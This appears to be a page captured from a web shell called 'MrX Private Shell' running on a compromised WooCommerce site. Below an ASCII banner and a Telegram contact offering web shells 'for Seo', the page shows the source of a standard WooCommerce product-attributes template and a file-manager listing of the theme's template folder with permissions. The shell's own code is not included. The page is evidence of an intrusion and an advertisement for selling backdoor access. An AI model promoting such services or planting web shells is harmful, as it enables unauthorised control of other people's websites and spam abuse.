__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Product attributes
*
* Used by list_attributes() in the products class.
*
* This template can be overridden by copying it to yourtheme/woocommerce/single-product/product-attributes.php.
*
* HOWEVER, on occasion WooCommerce will need to update template files and you
* (the theme developer) will need to copy the new files to your theme to
* maintain compatibility. We try to do this as little as possible, but it does
* happen. When this occurs the version of the template file will be bumped and
* the readme will list any important changes.
*
* @see https://woocommerce.com/document/template-structure/
* @package WooCommerce\Templates
* @version 9.3.0
*/
defined( 'ABSPATH' ) || exit;
if ( ! $product_attributes ) {
return;
}
?>
<table class="woocommerce-product-attributes shop_attributes" aria-label="<?php esc_attr_e( 'Product Details', 'woocommerce' ); ?>">
<?php foreach ( $product_attributes as $product_attribute_key => $product_attribute ) : ?>
<tr class="woocommerce-product-attributes-item woocommerce-product-attributes-item--<?php echo esc_attr( $product_attribute_key ); ?>">
<th class="woocommerce-product-attributes-item__label" scope="row"><?php echo wp_kses_post( $product_attribute['label'] ); ?></th>
<td class="woocommerce-product-attributes-item__value"><?php echo wp_kses_post( $product_attribute['value'] ); ?></td>
</tr>
<?php endforeach; ?>
</table>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| add-to-cart | Folder | 0775 |
|
|
| tabs | Folder | 0775 |
|
|
| back-in-stock-form.php | File | 2.56 KB | 0664 |
|
| meta.php | File | 1.58 KB | 0664 |
|
| photoswipe.php | File | 2.4 KB | 0664 |
|
| price.php | File | 861 B | 0664 |
|
| product-attributes.php | File | 1.39 KB | 0664 |
|
| product-image.php | File | 2.56 KB | 0664 |
|
| product-thumbnails.php | File | 1.56 KB | 0664 |
|
| rating.php | File | 1.4 KB | 0664 |
|
| related.php | File | 2.01 KB | 0664 |
|
| review-meta.php | File | 1.59 KB | 0664 |
|
| review-rating.php | File | 930 B | 0664 |
|
| review.php | File | 1.77 KB | 0664 |
|
| sale-flash.php | File | 1.02 KB | 0664 |
|
| share.php | File | 942 B | 0664 |
|
| short-description.php | File | 994 B | 0664 |
|
| stock.php | File | 771 B | 0664 |
|
| title.php | File | 770 B | 0664 |
|
| up-sells.php | File | 1.44 KB | 0664 |
|